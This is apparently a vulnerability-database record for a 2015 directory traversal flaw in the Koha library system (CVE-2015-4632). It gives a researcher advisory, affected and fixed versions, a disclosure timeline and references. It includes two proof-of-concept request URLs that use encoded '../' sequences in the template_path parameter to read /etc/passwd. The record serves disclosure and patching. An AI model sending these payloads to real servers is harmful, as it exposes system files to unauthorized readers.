Details of VAR-E-201506-0003

ID

VAR-E-201506-0003

CVE

cve_id:	CVE-2015-4632	Trust: 3.0
cve_id:	CVE-2015-4633	Trust: 1.4
cve_id:	CVE-2015-4631	Trust: 0.8

sources: BID: 75426 // PACKETSTORM: 132458 // EXPLOIT-DB: 37388 // EDBNET: 23427 // EDBNET: 23428 // EDBNET: 58614

EDB ID

37388

TITLE

Koha 3.20.1 - Directory Traversal - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 37388

DESCRIPTION

Koha 3.20.1 - Directory Traversal. CVE-2015-4632CVE-123654CVE-123653 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 37388

AFFECTED PRODUCTS

vendor:	koha	model:	-	scope:	eq	version:	3.20.1	Trust: 2.2
vendor:	koha	model:	-	scope:	lte	version:	<=3.20.1	Trust: 0.6
vendor:	koha	model:	ils	scope:	eq	version:	3.20.x	Trust: 0.5
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.20	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.18.7	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.18	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.16.11	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	eq	version:	3.16	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	ne	version:	3.20.1	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	ne	version:	3.18.8	Trust: 0.3
vendor:	koha	model:	library software community koha	scope:	ne	version:	3.16.12	Trust: 0.3

sources: BID: 75426 // PACKETSTORM: 132458 // EXPLOIT-DB: 37388 // EDBNET: 23427 // EDBNET: 23428 // EDBNET: 58614

EXPLOIT

# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4632

### CVE-2015-4632 ###

#### Titel: ####
Directory traversal

#### Type of vulnerability: ####
File Path Traversal

##### Exploitation vector:
Injecting into the "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search

##### Attack outcome:
Read access to arbitrary files on the system

#### Impact: ####
{low,medium,high,critical}
high

#### Software/Product name: ####
Koha

#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-4632

#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search

#### Proof-of-concept: ####
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Trust: 1.0

sources: EXPLOIT-DB: 37388

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 37388

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 37388

TYPE

Directory Traversal

Trust: 1.0

sources: EXPLOIT-DB: 37388

CREDITS

Raschin Tavakoli, Bernhard Garn, Peter Aufner & Dimitris Simos

Trust: 0.6

sources: EXPLOIT-DB: 37388

EXTERNAL IDS

db:	NVD	id:	CVE-2015-4632	Trust: 3.0
db:	EXPLOIT-DB	id:	37388	Trust: 1.6
db:	NVD	id:	CVE-2015-4633	Trust: 1.4
db:	NVD	id:	CVE-2015-4631	Trust: 0.8
db:	0DAYTODAY	id:	23801	Trust: 0.6
db:	EDBNET	id:	23427	Trust: 0.6
db:	0DAYTODAY	id:	23802	Trust: 0.6
db:	EDBNET	id:	23428	Trust: 0.6
db:	EDBNET	id:	58614	Trust: 0.6
db:	PACKETSTORM	id:	132458	Trust: 0.5
db:	BID	id:	75426	Trust: 0.3

sources: BID: 75426 // PACKETSTORM: 132458 // EXPLOIT-DB: 37388 // EDBNET: 23427 // EDBNET: 23428 // EDBNET: 58614

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2015-4632	Trust: 2.7
url:	https://nvd.nist.gov/vuln/detail/cve-2015-4633	Trust: 1.1
url:	https://0day.today/exploits/23801	Trust: 0.6
url:	https://0day.today/exploits/23802	Trust: 0.6
url:	https://www.exploit-db.com/exploits/37388/	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2015-4631	Trust: 0.5
url:	http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426	Trust: 0.3
url:	http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408	Trust: 0.3
url:	http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418	Trust: 0.3
url:	http://koha-community.org/	Trust: 0.3
url:	http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416	Trust: 0.3
url:	http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423	Trust: 0.3
url:	http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412	Trust: 0.3

sources: BID: 75426 // PACKETSTORM: 132458 // EXPLOIT-DB: 37388 // EDBNET: 23427 // EDBNET: 23428 // EDBNET: 58614

SOURCES

db:	BID	id:	75426
db:	PACKETSTORM	id:	132458
db:	EXPLOIT-DB	id:	37388
db:	EDBNET	id:	23427
db:	EDBNET	id:	23428
db:	EDBNET	id:	58614

LAST UPDATE DATE

2022-07-27T09:27:21.051000+00:00

SOURCES UPDATE DATE

db:

BID

id:

75426

date:

2015-06-25T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	75426	date:	2015-06-25T00:00:00
db:	PACKETSTORM	id:	132458	date:	2015-06-26T23:02:22
db:	EXPLOIT-DB	id:	37388	date:	2015-06-26T00:00:00
db:	EDBNET	id:	23427	date:	2015-06-26T00:00:00
db:	EDBNET	id:	23428	date:	2015-06-26T00:00:00
db:	EDBNET	id:	58614	date:	2015-06-26T00:00:00

tag:	exploit	Trust: 0.5
tag:	remote	Trust: 0.5
tag:	vulnerability	Trust: 0.5
tag:	xss	Trust: 0.5
tag:	sql injection	Trust: 0.5
tag:	csrf	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE